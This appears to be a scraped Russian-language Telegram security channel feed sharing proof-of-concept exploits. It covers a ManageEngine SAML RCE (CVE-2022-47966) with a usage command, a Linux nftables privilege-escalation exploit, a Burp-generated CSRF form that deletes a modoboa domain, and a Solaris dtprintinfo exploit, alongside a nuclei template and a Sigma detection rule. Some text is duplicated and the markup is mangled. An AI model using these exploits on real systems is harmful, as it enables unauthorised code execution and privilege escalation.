CVE-2022-47966
*
Список ПО от ManageEngine подверженных атаке поражает !
*
Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.
*
read
*
POC/exploit
*
Usage:
*
Список ПО от ManageEngine подверженных атаке поражает !
*
Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.
*
read
*
POC/exploit
*
Usage:
python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe👍2🔥1
В продолжении темы
Появился nuclei-template для дыры CVE-2022-47966.yaml
Ну и сам nuclei забрать тут
****
Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать
Появился nuclei-template для дыры CVE-2022-47966.yaml
Ну и сам nuclei забрать тут
****
Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать
👍7🔥1
CVE-2023-0179-linux_exploit.rar
9.7 KB
CVE-2023-0179 PoC
эксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6
Понять глубину
#linux #kernel #lpe #nftables
эксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6
Понять глубину
#linux #kernel #lpe #nftables
🔥2👍1
CVE-2023-0398 modoboa - mail Server
CSRF приводит к удалению домена
*
usage fot BURP:
CSRF приводит к удалению домена
*
usage fot BURP:
<html>read
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<noscript>history.pushState('', '', '/')</noscript>
<form action="http://127.0.0.1:8000/admin/domains/4/delete/">
<input type="submit" value="Submit request" />
</form>
<noscript>
document.forms[0].submit();
</noscript>
</body>
</html>
🔥4👍3😱1
LPE - Solaris 10
Злоупотребление в dtprintinfo
*
Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красиво
exploit
Злоупотребление в dtprintinfo
*
Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красиво
exploit
👍10